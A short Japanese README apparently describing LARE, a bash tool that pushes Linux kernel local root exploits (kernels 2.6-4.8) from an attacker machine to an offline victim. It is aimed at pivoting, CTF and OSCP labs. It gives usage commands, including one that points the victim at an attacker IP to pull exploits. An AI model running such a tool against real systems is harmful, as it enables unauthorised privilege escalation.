
[L]ocal [A]uto [R]oot [E]xploiter は、被害マシンがインターネットに接続できない場合に、攻撃マシンからローカルルートエクスプロイトを展開するのに役立つシンプルなbashスクリプトです。
[L]ocal(ローカル)[A]uto(自動)[R]oot(ルート)[E]xploiter(エクスプロイター)は、攻撃元のマシンから被害マシンへのローカルルートエクスプロイトの展開を支援するシンプルなbashスクリプトです。これは、被害マシンがインターネットに接続していない場合に使用されます。
このスクリプトは、被害マシンがインターネット接続を持たないシナリオ(例:内部ネットワークへのピボット中や、VPNを使用して閉じられたラボ(例:hackthebox.gr)に接続するCTF、さらにはOSCPラボなど)で役立ちます。
このスクリプトは、Linuxカーネル2.6-4.8向けのローカルルートエクスプロイトを使用します。
このスクリプトは、Nilotpal BiswasのAuto Root Exploit Toolに触発されています。
bash LARE.sh -a or ./LARE.sh -a
それが完了したら、scriptを被害マシンに任意の手段(wget, ftp, curl など)でコピーし、以下のコマンドでローカルにエクスプロイターを実行します。
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
このスクリプトはマシン上で複数のカーネルエクスプロイトを実行し、システムの不安定性を引き起こす可能性があります。最後の手段として、かつ本番環境以外で使用することを強くお勧めします。